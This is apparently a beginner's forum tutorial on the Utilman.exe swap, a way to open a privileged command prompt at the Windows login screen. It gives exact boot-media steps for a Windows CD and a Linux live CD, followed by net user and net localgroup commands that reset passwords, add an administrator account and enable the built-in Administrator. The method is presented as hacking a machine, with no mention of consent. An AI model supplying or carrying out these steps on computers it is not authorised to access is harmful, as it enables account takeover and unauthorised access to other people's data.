How To: Reset Windows Password with a Windows CD or a Linux CD

Hello everyone!

I'm glad to post my first tutorial and hope you will appreciate it.
I'm a beginner in hacking so I don't have a lot of stuff to teach you, but maybe this tuto would help some of you.
And sorry for my limited English... I do my best.

In this tutorial I will show you how to access to cmd.exe in the login menu.

You can do a lot of things with cmd.exe but in this case it will be principally to reset the password of a user, create a new user with admin right or activate the Administrator user.

On windows, there is a file called Utilman.exe. This is a tool that can narrate the text, it can zoom, use an On screen Keyboard etc…

This tool can be launch in the login menu using Windows + U.
We will replace this file by cmd.exe so when you press Windows+U it will launch the command prompt.

I learned this tip in this tutorial but it's in French and I'd like to share it to the Null Byte community.

Note that it works on windows XP, Vista, 7, 8, 8.1 and 10.

Step 1: Using a Windows CD

Obviously, you need the Windows installation CD corresponding to the Windows you want to hack.
For the exemple I use Windows 7 but it's basically the same things on every OS

• First, boot on the CD (I think I don't need to teach you how to do that).
• Click "next" -> "Repair your computer" -> Select your OS -> "Command Prompt"

If you're on a command prompt, all is OK.

First, we will enter to our main partition. The main partition is certainly C:\ but we're on the CD so it's often D:\. To be sure, use the command "dir" to know if you're on the right partition.

Use this command to enter in a partition (here, this is the D:\ partition)

• d:

We go to Windows\System32

• cd Windows/System32

Now we create a backup file of Utilman.exe so we can recover it.

• Copy Utilman.exe Utilman.bak

Finally we replace Utilman.exe by cmd.exe (We copy the file cmd.exe with the name "Utilman.exe")

• Copy cmd.exe Utilman.exe

And type "y" to accept.

Now restart the computer to access the windows login menu. I explain in the next step how to reset a password

Now we will restore the Utilman.exe

• Boot on the CD
• Click "next" -> "Repair your computer" -> Select your OS -> "Command Prompt"

• d:
• cd Windows/System32
• del Utilman.exe
• ren Utilman.bak Utilman.exe

Step 2: Using a Linux Live CD

The advantage with a Linux CD is that it works on every Windows version. You don't need the specific CD of the windows version.

It's exactly the same manipulation but the name of the commands are a little different.

• Boot on Your CD
• Open a terminal

First we need to know which partition is the right windows partition

• fdisk –l

In the example, we can see that the sda3 is "Microsoft basic data" and the size is 213.3Go.
We can easily deduct it's the windows partition.

Here is the commands to mount the partition and replace Utilman.exe by Cmd.exe:

• mount /dev/sda3 /mnt/sda3
• cd /mnt/sda3/Windows/System32
• mv Utilman.exe Utilman.bak
• cp cmd.exe Utilman.exe

And to restore Utilman.exe:

• rm Utilman.exe
• mv Utilman.bak Utilman.exe

Step 3: At the Login Menu

When you're at the login menu, press windows+U and normally the Command Prompt will appear.
Here is some useful command:

To change a user's password:

• Net user "username" "newPassword"

To create a new user with admin right:

• net user "newUser" "password" /add
• net localgroup Administrators "newUser" /add

To activate the Administrator user and change his password:

• net user administrator /active:yes
• net user administrator "newPassword"

There is certainly a lot of useful command but I let your imagination find them

Thank you for reading this tutorial, don't hesitate to give me your feedback, it will be really helpful for me!